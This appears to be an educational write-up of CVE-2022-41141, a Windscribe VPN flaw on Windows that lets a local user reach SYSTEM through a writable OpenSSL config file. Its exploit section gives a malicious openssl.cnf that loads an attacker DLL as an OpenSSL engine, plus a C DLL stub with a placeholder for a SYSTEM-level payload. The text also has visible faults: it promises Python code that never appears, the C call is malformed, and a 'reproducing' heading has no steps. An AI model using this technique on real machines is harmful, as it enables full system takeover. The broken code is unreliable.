CVE-2022-41141 is a privilege escalation vulnerability found in the Windscribe VPN application for Windows. This flaw, tracked by Zero Day Initiative as ZDI-CAN-16859, enables local attackers to run code as SYSTEM—a powerful Windows user account. All someone needs is the ability to run code with low privileges on the computer.

The root cause is simple, yet dangerous: Windscribe loads its OpenSSL configuration file (openssl.cnf) from a location on disk where non-administrative users can write. This lets an attacker replace the config file with one that runs any code they want when OpenSSL starts.

If you’re running Windscribe on Windows, understanding how this works—and how to defend against it—is important.

The Problematic Setup

After installing Windscribe, the application uses OpenSSL for cryptographic functions. To load its necessary settings, Windscribe reaches out for an openssl.cnf configuration file, after elevation, from its installation directory—typically in C:\Program Files (x86)\Windscribe\.

Here’s where things go wrong: because of permission misconfigurations during installation or operation, sometimes this directory (or some files within it) can be modified by less privileged users, like members of the 'Users' group.

The Exploit Path

1. Attacker gains low-level access: This might be a standard user account, or the attacker compromises a low-privileged service or script.
2. Attacker writes a malicious openssl.cnf: The attacker drops their own crafted configuration file in the Windscribe directory.
3. Trigger the application as SYSTEM: The Windscribe service (which runs as SYSTEM) or another process controlled by Windscribe starts, loading the attacker's configuration file.
4. Privilege escalation: The attacker’s code (referenced in the malicious config) is executed as SYSTEM.

Exploit Example: Code Snippet

Below is a Python-based demonstration showing how a user could abuse the configuration path to load a malicious DSO (shared library) into the process, using OpenSSL’s openssl.cnf handling.

Suppose the attacker drops a DLL (“malicious.dll”) to the same writable directory.

malicious_openssl.cnf

openssl_conf = myconf

[myconf]
engines = engine_section

[engine_section]
foo = foo_section

[foo_section]
dynamic_path = C:\\Program Files (x86)\\Windscribe\\malicious.dll
engine_id = foo
init = 1

How this works: Whenever OpenSSL loads and reads this configuration, it will load the specified DLL as an OpenSSL "engine", but actually executing attacker code.

#### Example DLL (C/C++)

Here’s a very simple malicious Windows DLL exporting the required symbols

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        MessageBoxA(, "Privilege Escalation Achieved!", "CVE-2022-41141", MB_OK);
        // Insert your SYSTEM-level payload here
    }
    return TRUE;
}

Attacker compiles this as “malicious.dll” and drops it alongside the malicious openssl.cnf.

Step-by-Step: Reproducing the Exploit

*Remember, this is for educational awareness—never exploit a system you don’t own or have explicit permission to test.*

Real-World Impact

- Full compromise: Any SYSTEM-level code can disable antivirus, steal credentials, or persist via rootkits.
- Stealth: Typical EDR solutions may miss this, since OpenSSL is loading the DLL via a configuration file, not an external process injection.

For Users

- Update Windscribe: After disclosure, Windscribe released patches. Make sure you are running the latest version.

Review all installed programs: Ensure none of their folders are world-writable.

- Monitor for unexpected config/DLL changes: Basic file integrity monitoring helps.

References & Further Reading

- Zero Day Initiative Advisory ZDI-22-1522 (ZDI-CAN-16859)
- NVD Entry for CVE-2022-41141
- Windscribe Release Notes
- OpenSSL docs: openssl.cnf

Summary

CVE-2022-41141 is a critical reminder that configuration file permissions matter—sometimes more than the code itself! Anyone running Windscribe on Windows should double-check for updates and permissions on sensitive installation files. Failing to do so could hand an attacker full control over your system.

*Always patch, and keep a close eye on your install directories!*


*This guide was written for those new to security and for experienced defenders. Please share responsibly and help make software safer for everyone.*

Timeline

Published on: 01/26/2023 18:59:00 UTC
Last modified on: 02/03/2023 19:44:00 UTC